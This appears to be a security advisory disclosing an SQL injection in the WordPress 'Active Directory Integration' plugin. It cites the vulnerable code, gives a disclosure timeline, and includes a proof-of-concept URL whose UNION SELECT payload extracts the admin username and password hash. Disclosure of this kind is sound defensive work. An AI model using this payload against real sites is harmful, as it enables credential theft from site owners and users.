Homepage:
https://wordpress.org/plugins/active-directory-integration/
Description:
- Type user access: administrator user.
- Target need have configured ldap and active.
$_GET[‘userid’] is not escaped.
File / Code:
Path Request: /wp-content/plugins/active-directory-integration/syncback.php
Line : 135
$result = $ADI->bulksyncback( $_GET['userid'] );
Path Method: /wp-content/plugins/active-directory-integration/BulkSyncBackADIntegrationPlugin.class.php
Line: 142
// They must have a wp_usermeta.metakey = 'adi_samaccount' with a not empty meta_value and User 1 (admin) is excluded.// They must have a wp_usermeta.metakey = 'adi_samaccount' with a not empty meta_value and User 1 (admin) is excluded.
... else {
$users = $wpdb->get_results("SELECT user_id FROM $wpdb->usermeta WHERE meta_key = 'adi_samaccountname' AND meta_value <> '' AND user_id <> 1 AND user_id = $userid");
}
Proof of Concept:
1 – Log in with administrator user.
target.dev/wp-content/plugins/active-directory-integration/syncback.php?userid=1+UNION+SELECT+CONCAT(user_login,char(58),user_pass)+FROM+wp_users+WHERE+ID=1
2 – Result:
Timeline:
- 07/09/2017 – Discovered
- 11/09/2017 – Vendor finded
- 03/11/2017 – Publish